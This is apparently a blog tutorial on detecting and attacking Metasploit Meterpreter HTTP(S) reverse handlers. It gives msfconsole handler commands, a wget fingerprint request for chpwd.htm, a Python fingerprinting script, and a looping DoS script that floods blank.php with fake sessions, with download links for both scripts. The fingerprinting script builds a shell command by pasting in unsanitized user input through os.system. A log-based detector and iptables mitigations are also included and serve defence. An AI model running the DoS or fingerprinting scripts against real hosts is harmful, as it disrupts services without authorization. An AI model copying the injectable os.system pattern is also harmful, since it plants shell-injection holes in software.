Identifying and attacking Meterpreter's HTTP or HTTPS handler
This article shows how to identify Meterpreter's HTTP or HTTPS handler, and how to launch DoS attacks against it (by setting up fake sessions between attackers and listeners).
Summary:
1. Request a specific file through an HTTP GET and check whether its contents contain strings such as "core_patch_url" to identify reverse handlers.
By sending an unexpected GET request, the handler or listener can be made to fail to process it, or to crash; the listener can be tricked into believing that a Meterpreter session is being opened, or forced to stop accepting sessions.
2. Request a special file to make the handler mistakenly believe that a Meterpreter session is about to connect, so that it stops accepting other sessions.
Download:
Reverse Handler Dos Script: https://gist.github.com/x-42/10e1ce596a7cb27877b6
Reverse Handler detection Script: https://gist.github.com/x-42/b663a0af20cda4aa0683
First, configure the HTTP handler port and start it, then visit it as you would a website:
[*] [2016.01.27-14:59:21] Listening for incoming connections on 0.0.0.0:27170 (windows/meterpreter/reverse_http)...
[*] [2016.01.27-14:59:21] Started as job # 0
[*] [2016.01.27-14:59:21] Started HTTP reverse handler on http://0.0.0.0:27170/
[*] [2016.01.27-14:59:21] Starting the payload handler...
The handler actually serves many different files, and requesting different ones causes unexpected behaviour in the listener.
Requesting some of these files lets us confirm that a listener is running on this server, or forge a reverse Meterpreter connection.
Next, run a handler for reverse HTTPS-based connections to Meterpreter:
use exploit/multi/handler
set ExitOnSession false
set LHOST 666.666.666.666
set LPORT 65535
set PAYLOAD windows/meterpreter/reverse_https
exploit -j
Once the handler is running, request the chpwd.htm file:
$ wget -qO- --no-check-certificate https://666.666.666.666/chpwd.htm?core_patch_url??/LUDZ6djujGbWvte_gMomnQm7EQVgW7RJfg3xpGoDUgRe_SdhLJBud68viiiDN1UsrniHZsjxLn9qYOo4YJIIU6K5ZnhNsuoGoPuWqKpQQVtxU6L4EQg8ka9cZ4aJ-/
You can see the contents of the chpwd.htm file: the string "core_patch_url" is displayed, followed by a run of random characters. "core_patch_url" is our fingerprint.
On the listener side, we see the following log entry when chpwd.htm is requested:
192.168.99.3:53465 (UUID: f376e70ee8e1264d/x86=1/windows=1/2016-01-27T07:00:04Z) Redirecting stageless connection from /chpwd.htm with UA 'Mozilla/5.0 (Windows NT 10.0; WOW64
We can also request the "blank.php" file. Opening the downloaded file shows that it is an MS Windows executable whose extension has been changed to .php for reasons unknown.
On the listener side, we see the following log when blank.php is requested:
The request for blank.php appears to trigger the Python stage. In practice the handler prepares to receive a Meterpreter session and, because the session is invalid, closes it shortly afterwards.
From the preceding Meterpreter logs, we can construct a "fake" session for the handler to process (or terminate the session early). In essence, by continuously constructing "fake" sessions, the handler can be kept from processing the connections of "real" sessions.
Besides chpwd.htm and blank.php, we can also request the following files.
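As an added example (not part of the original post, and not code from the Metasploit project), the following Python script parses handler output lines like the "Redirecting stageless connection" entry shown above and flags sources that look like fingerprinting or fake-session flooding rather than a real implant. The log lines, IP addresses, UUIDs and user agents are constructed for the example; the allowlist argument stands for the address(es) the real payload is expected to call back from.

```python
#!/usr/bin/env python3
# Added example: detect fingerprinting / fake-session flooding in handler output.
# Not part of the original post and not Metasploit code.
import re
from collections import defaultdict

# Constructed sample lines, modelled on the handler log shown in the post.
# 10.0.0.5 is the only host an implant is expected from in this scenario.
SAMPLE_LOG = """\
10.0.0.5:49212 (UUID: 0123456789abcdef/x86=1/windows=1/2016-01-27T07:00:04Z) Redirecting stageless connection from /chpwd.htm with UA 'Mozilla/5.0 (Windows NT 10.0; WOW64)'
203.0.113.7:53465 (UUID: fedcba9876543210/x86=1/windows=1/2016-01-27T07:00:10Z) Redirecting stageless connection from /chpwd.htm with UA 'Wget/1.17'
203.0.113.7:53466 (UUID: fedcba9876543211/x86=1/windows=1/2016-01-27T07:00:11Z) Redirecting stageless connection from /blank.php with UA 'Wget/1.17'
203.0.113.7:53467 (UUID: fedcba9876543212/x86=1/windows=1/2016-01-27T07:00:12Z) Redirecting stageless connection from /blank.php with UA 'Wget/1.17'
203.0.113.7:53468 (UUID: fedcba9876543213/x86=1/windows=1/2016-01-27T07:00:13Z) Redirecting stageless connection from /blank.php with UA 'Wget/1.17'
"""

# Matches the "Redirecting stageless connection" line format shown in the post.
LINE_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) "
    r"\(UUID: (?P<uuid>[0-9a-f]+)/[^)]*\) "
    r"Redirecting stageless connection from (?P<path>\S+) with UA '(?P<ua>[^']*)'"
)

# User agents that point at a command-line fetch tool rather than an implant.
TOOL_UA_PREFIXES = ("Wget", "curl", "python")


def parse_handler_log(text):
    """Return one dict per 'Redirecting stageless connection' line; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def find_suspicious_sources(events, expected_ips, max_redirects=3):
    """Group events by source IP and return {ip: [reasons]} for sources worth a look.

    expected_ips: the addresses the real payload should call back from
    (the same allowlist the iptables mitigation later in the post relies on).
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        reasons = []
        if ip not in expected_ips:
            reasons.append("source not in implant allowlist")
        if len(evs) > max_redirects:
            reasons.append("%d stageless redirects (limit %d)" % (len(evs), max_redirects))
        if any(ev["ua"].startswith(TOOL_UA_PREFIXES) for ev in evs):
            reasons.append("command-line user agent")
        # Heuristic: a single implant reuses its UUID across reconnects, so
        # several different UUIDs from one host suggests hand-crafted requests.
        if len({ev["uuid"] for ev in evs}) > 1:
            reasons.append("multiple payload UUIDs from one source")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in find_suspicious_sources(parse_handler_log(SAMPLE_LOG), {"10.0.0.5"}).items():
        print("%s: %s" % (ip, "; ".join(reasons)))
```

Point it at saved msfconsole output (or a spool file) and at the callback addresses you actually expect; anything else repeatedly requesting chpwd.htm or blank.php is either someone fingerprinting the listener or the flooding described above, and is the traffic the iptables rules below are meant to keep off the port.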
The Python script for fingerprinting is as follows:
#!/usr/bin/env python
# checks to see if a port is running a metasploit reverse https listener service.
# checks a url for the existence of a file called "chpwd.htm" which contains "core_patch_url" in its contents.
# Usage: python finger.py http[s]://ip:port
import os
import sys

class x:
    r = '\033[91m'  # red
    b = '\033[0m'   # reset colour

if len(sys.argv) != 2:
    print('Usage: python %s [http(s)://ip:port]' % sys.argv[0])
    exit()

target_ip = sys.argv[1]
outfile = '/tmp/handler_finger'
# fetch chpwd.htm with wget and store the response body locally
os.system("wget -qO- --no-check-certificate " + target_ip + "/chpwd.htm" + " --output-document=" + outfile)
if not os.path.exists(outfile):
    print(x.r + "No response from " + target_ip + x.b)
    exit()
with open(outfile, 'r', errors='ignore') as content:
    content = content.read()

if "core_patch_url" in content:
    print(x.r + "*** Looks like a Metasploit Handler is listening on " + target_ip + " ***" + x.b)
else:
    print(x.r + "Not a Metasploit Listener." + x.b)
This is a DoS script that constantly requests blank.php, so that the handler cannot process legitimate requests.
#!/usr/bin/env python
import os
import sys

if len(sys.argv) != 2:
    print('Usage: python %s [http(s)://ip:port]' % sys.argv[0])
    exit()

ip = sys.argv[1]

def dos():
    # request blank.php so the handler starts preparing a (fake) session
    for i in range(1):
        os.system("wget -qO- --no-check-certificate " + ip + "/blank.php" + " --output-document=/tmp/blank.php")

while True:
    print('.' * 30)
    dos()
    print("Press CTRL-Z to DoS the Listener")  # This is required to kill the connection prematurely
Mitigation
By default, the listener is configured to accept a payload with any UUID. Set "IgnoreUnknownPayloads true" in your resource script or in msfconsole. Note that this only takes effect when both the payload and the listener are configured for "Paranoid Mode". For more information, see here.
Alternatively, use iptables to allow connections to the listener port only from the target's IP address. Both rules use -I, so run them in this order: the ACCEPT rule, inserted second, ends up above the DROP rule and is matched first.
iptables -I INPUT -p tcp -m tcp -s 0.0.0.0/0 --dport $LISTENER_PORT -j DROP
iptables -I INPUT -p tcp -m tcp -s $SHELL_IP --dport $LISTENER_PORT -j ACCEPT